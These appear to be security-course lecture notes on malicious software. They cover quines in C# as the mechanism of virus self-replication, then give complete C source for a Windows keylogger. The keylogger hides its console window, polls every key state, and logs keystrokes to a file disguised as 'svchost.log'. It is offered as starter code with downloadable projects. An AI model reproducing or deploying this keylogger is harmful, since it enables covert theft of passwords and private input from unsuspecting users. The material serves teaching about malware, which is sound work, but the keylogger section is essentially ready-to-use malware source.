Malicious Software

Although this includes a wide variety of software, and you should read chapter 10 in preparation for the exam, I'm going to concentrate on two types in this lecture: Viruses and Keyloggers.


Viruses must be able to copy themselves verbatim onto other systems. The question is how? Can code (ascii or otherwise) make a copy of itself? See if you can devise a logical sequence of actions that will output the same sequence of actions.

In general, the method used to create a quine in any programming language is to have, within the program, two pieces: (a) code used to do the actual printing and (b) data that represents the textual form of the code (e.g., progdata in the first C example below). The code functions by using the data to print the code (which makes sense since the data represents the textual form of the code), but it also uses the data, processed in a simple way (e.g., quote() below) to print the textual representation of the data itself. (see:

Here is one written in C#:

   1 using System; 
   2 class Q 
   3 { 
   4      static void Main() 
   5      { 
   6           string s = "using System;class Q{2}static void Main(){2}string s ={1}{0}{1};Console.Write(string.Format(s, s, (char)34, (char)123, (char)125));{3}{3}";
   7           Console.Write(string.Format(s, s, (char)34, (char)123, (char)125)); 
   8      } 
   9 } 

To make it work perfectly, you need to reformat it as follows:

   1 using System;class Q{static void Main(){string s = "using System;class Q{2}static void Main(){2}string s ={1}{0}{1};Console.Write(string.Format(s, s, (char)34, (char)123, (char)125));{3}{3}";Console.Write(string.Format(s, s, (char)34, (char)123, (char)125));}}

Does that look a bit esoteric? Look at a longer one, but one that is easier to follow:

   1 using System;
   2 class P
   3 {
   4     static void Main()
   5     {
   6         string[] S = {
   7 "        Console.WriteLine(\"using System;\");",
   8 "        Console.WriteLine(\"class P {\");",
   9 "        Console.WriteLine(\"    static void Main() {\");",
  10 "",
  11 "        Console.WriteLine(\"        string[] S = {\");",
  12 "        foreach (string line in S) {",
  13 "            string escapedLine = line.Replace(@\"\\\", @\"\\\\\")",
  14 "                .Replace(\"\\\"\", \"\\\\\\\"\");",
  15 "            Console.WriteLine(\"\\\"{0}\\\",\", escapedLine);",
  16 "        }",
  17 "        Console.WriteLine(\"        };\");",
  18 "",
  19 "        foreach (string line in S) Console.WriteLine(line);",
  20 "",
  21 "        Console.WriteLine(\"    }\");",
  22 "        Console.WriteLine(\"}\");",
  23         };
  24         Console.WriteLine("using System;");
  25         Console.WriteLine("class P {");
  26         Console.WriteLine("    static void Main() {");
  28         Console.WriteLine("        string[] S = {");
  29         foreach (string line in S)
  30         {
  31             string escapedLine = line.Replace(@"\", @"\\")
  32                 .Replace("\"", "\\\"");
  33             Console.WriteLine("\"{0}\",", escapedLine);
  34         }
  35         Console.WriteLine("        };");
  37         foreach (string line in S) Console.WriteLine(line);
  39         Console.WriteLine("    }");
  40         Console.WriteLine("}");
  41     }
  42 }


The following source code will get you started. To just download the examples use the links at the end of this section.

   1 int _tmain(int argc, _TCHAR* argv[])
   2 {
   3         HWND stealth; /*creating stealth (window is not visible)*/
   4         AllocConsole();
   5         stealth=FindWindowA("ConsoleWindowClass",NULL);
   6         ShowWindow(stealth,0);
   7         int t=get_keys();
   8         return t;
   9 }  
  11 int get_keys(void)
  12 {
  13         short character;
  14         while(1)
  15         {
  16                 for(character=8;character<=222;character++)
  17                 {
  18                         if(GetAsyncKeyState(character)==-32767)
  19                         {   
  20                                 FILE *file;
  21                                 file=fopen("svchost.log","a+");
  22                                 if(file==NULL)
  23                                 {
  24                                         return 1;
  25                                 }                       
  26                                 if(file!=NULL)
  27                                 {               
  28                                         if((character>=39)&&(character<=64))
  29                                         {
  30                                                 fputc(character,file);
  31                                                 fclose(file);
  32                                                 break;
  33                                         }               
  34                                         else if((character>64)&&(character<91))
  35                                         {
  36                                                 character+=32;
  37                                                 fputc(character,file);
  38                                                 fclose(file);
  39                                                 break;
  40                                         }
  41                                         else
  42                                         { 
  43                                                 switch(character)
  44                                                 {
  45                                                 case VK_SPACE:
  46                                                         fputc(' ',file);
  47                                                         fclose(file);
  48                                                         break;  
  49                                                 case VK_SHIFT:
  50                                                         fputs("[SHIFT]",file);
  51                                                         fclose(file);
  52                                                         break;                                                                                  
  53                                                 case VK_RETURN:
  54                                                         fputs("\n[ENTER]",file);
  55                                                         fclose(file);
  56                                                         break;
  57                                                 case VK_BACK:
  58                                                         fputs("[BACKSPACE]",file);
  59                                                         fclose(file);
  60                                                         break;
  61                                                 case VK_TAB:
  62                                                         fputs("[TAB]",file);
  63                                                         fclose(file);
  64                                                         break;
  65                                                 case VK_CONTROL:
  66                                                         fputs("[CTRL]",file);
  67                                                         fclose(file);
  68                                                         break;  
  69                                                 case VK_DELETE:
  70                                                         fputs("[DEL]",file);
  71                                                         fclose(file);
  72                                                         break;
  73                                                 case VK_OEM_1:
  74                                                         fputs("[;:]",file);
  75                                                         fclose(file);
  76                                                         break;
  77                                                 case VK_OEM_2:
  78                                                         fputs("[/?]",file);
  79                                                         fclose(file);
  80                                                         break;
  81                                                 case VK_OEM_3:
  82                                                         fputs("[`~]",file);
  83                                                         fclose(file);
  84                                                         break;
  85                                                 case VK_OEM_4:
  86                                                         fputs("[ [{ ]",file);
  87                                                         fclose(file);
  88                                                         break;
  89                                                 case VK_OEM_5:
  90                                                         fputs("[\\|]",file);
  91                                                         fclose(file);
  92                                                         break;                                                          
  93                                                 case VK_OEM_6:
  94                                                         fputs("[ ]} ]",file);
  95                                                         fclose(file);
  96                                                         break;
  97                                                 case VK_OEM_7:
  98                                                         fputs("['\"]",file);
  99                                                         fclose(file);
 100                                                         break;
 101                                                 case VK_NUMPAD0:
 102                                                         fputc('0',file);
 103                                                         fclose(file);
 104                                                         break;
 105                                                 case VK_NUMPAD1:
 106                                                         fputc('1',file);
 107                                                         fclose(file);
 108                                                         break;
 109                                                 case VK_NUMPAD2:
 110                                                         fputc('2',file);
 111                                                         fclose(file);
 112                                                         break;
 113                                                 case VK_NUMPAD3:
 114                                                         fputc('3',file);
 115                                                         fclose(file);
 116                                                         break;
 117                                                 case VK_NUMPAD4:
 118                                                         fputc('4',file);
 119                                                         fclose(file);
 120                                                         break;
 121                                                 case VK_NUMPAD5:
 122                                                         fputc('5',file);
 123                                                         fclose(file);
 124                                                         break;
 125                                                 case VK_NUMPAD6:
 126                                                         fputc('6',file);
 127                                                         fclose(file);
 128                                                         break;
 129                                                 case VK_NUMPAD7:
 130                                                         fputc('7',file);
 131                                                         fclose(file);
 132                                                         break;
 133                                                 case VK_NUMPAD8:
 134                                                         fputc('8',file);
 135                                                         fclose(file);
 136                                                         break;
 137                                                 case VK_NUMPAD9:
 138                                                         fputc('9',file);
 139                                                         fclose(file);
 140                                                         break;
 141                                                 case VK_CAPITAL:
 142                                                         fputs("[CAPS LOCK]",file);
 143                                                         fclose(file);
 144                                                         break;
 145                                                 default:
 146                                                         fclose(file);
 147                                                         break;
 148                                                 }               
 149                                         }       
 150                                 }               
 151                         }       
 152                 }                                 
 154         }
 155         return EXIT_SUCCESS;                                                    
 156 }                                                                                                

The source files are here:

Sipped Projects

You can get the Visual Studio 2010 projects in zipped format here: